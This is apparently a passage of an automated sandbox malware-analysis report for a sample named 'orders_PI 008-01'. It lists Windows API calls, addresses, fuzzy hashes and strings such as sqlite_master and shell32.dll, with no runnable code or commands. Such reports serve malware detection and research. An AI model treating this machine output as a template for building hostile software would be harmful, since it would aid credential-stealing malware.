                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: @
                                        • API String ID: 3510742995-2766056989
                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                        • memset.MSVCRT ref: 0040AF18
                                        • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                        • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                        • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                        • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                        APIs
                                        • memset.MSVCRT ref: 004144E7
                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                        • memset.MSVCRT ref: 0041451A
                                        • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                        • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                        • memset.MSVCRT ref: 0042FED3
                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: sqlite_master
                                        • API String ID: 438689982-3163232059
                                        • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                        • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                        • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                        • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                        • wcscpy.MSVCRT ref: 00414DF3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                        • String ID:
                                        • API String ID: 3917621476-0
                                        • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                        • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                        • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                        • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                        APIs
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • _snwprintf.MSVCRT ref: 00410FE1
                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • _snwprintf.MSVCRT ref: 0041100C
                                        • wcscat.MSVCRT ref: 0041101F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                        • String ID:
                                        • API String ID: 822687973-0
                                        • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                        • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                        • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                        • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                        • malloc.MSVCRT ref: 00417459
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7556DF80,?,0041755F,?), ref: 00417478
                                        • free.MSVCRT ref: 0041747F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$freemalloc
                                        • String ID:
                                        • API String ID: 2605342592-0
                                        • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                        • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                        • RegisterClassW.USER32(00000001), ref: 00412428
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID:
                                        • API String ID: 2678498856-0
                                        • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                        • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item
                                        • String ID:
                                        • API String ID: 3888421826-0
                                        • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                        • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                        • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                        • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                        APIs
                                        • memset.MSVCRT ref: 00417B7B
                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                        • GetLastError.KERNEL32 ref: 00417BB5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$ErrorLastLockUnlockmemset
                                        • String ID:
                                        • API String ID: 3727323765-0
                                        • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                        • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                        • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                        • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                        APIs
                                        • memset.MSVCRT ref: 0040F673
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                        • strlen.MSVCRT ref: 0040F6A2
                                        • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                        • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                        APIs
                                        • memset.MSVCRT ref: 0040F6E2
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                        • strlen.MSVCRT ref: 0040F70D
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                        • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                        APIs
                                        • memset.MSVCRT ref: 00402FD7
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                        • strlen.MSVCRT ref: 00403006
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                        • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                        • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                        • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                        APIs
                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 764393265-0
                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                        Similarity
                                        • API ID: Time$System$File$LocalSpecific
                                        • String ID:
                                        • API String ID: 979780441-0
                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                        APIs
                                        • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                        • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                        APIs
                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                        Strings
                                        Similarity
                                        • API ID: InvalidateMessageRectSend
                                        • String ID: d=E
                                        • API String ID: 909852535-3703654223
                                        • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                        • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                        • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                        • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                        APIs
                                        • wcschr.MSVCRT ref: 0040F79E
                                        • wcschr.MSVCRT ref: 0040F7AC
                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                        Strings
                                        Similarity
                                        • API ID: wcschr$memcpywcslen
                                        • String ID: "
                                        • API String ID: 1983396471-123907689
                                        • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                        • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                        APIs
                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                        • _memicmp.MSVCRT ref: 0040C00D
                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                        Strings
                                        Similarity
                                        • API ID: FilePointer_memicmpmemcpy
                                        • String ID: URL
                                        • API String ID: 2108176848-3574463123
                                        • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                        • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                        • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                        • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                        APIs
                                        • _snwprintf.MSVCRT ref: 0040A398
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                        Strings
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                        • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _snwprintf
                                        • String ID: %%-%d.%ds
                                        • API String ID: 3988819677-2008345750
                                        • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                        • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                        APIs
                                        • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                        • memset.MSVCRT ref: 00401917
                                        Strings
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                        • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                        APIs
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • wcsrchr.MSVCRT ref: 0040DCE9
                                        • wcscat.MSVCRT ref: 0040DCFF
                                        Strings
                                        Similarity
                                        • API ID: FileModuleNamewcscatwcsrchr
                                        • String ID: _lng.ini
                                        • API String ID: 383090722-1948609170
                                        • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                        • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                        • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                        • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                        Strings
                                        Similarity
                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2773794195-880857682
                                        • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                        • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                        • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                        • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                        • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                        Strings
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID: MZ@
                                        • API String ID: 1378638983-2978689999
                                        • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                        • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                        • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                        • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                        • memset.MSVCRT ref: 0042BAAE
                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID:
                                        • API String ID: 438689982-0
                                        • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                        • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
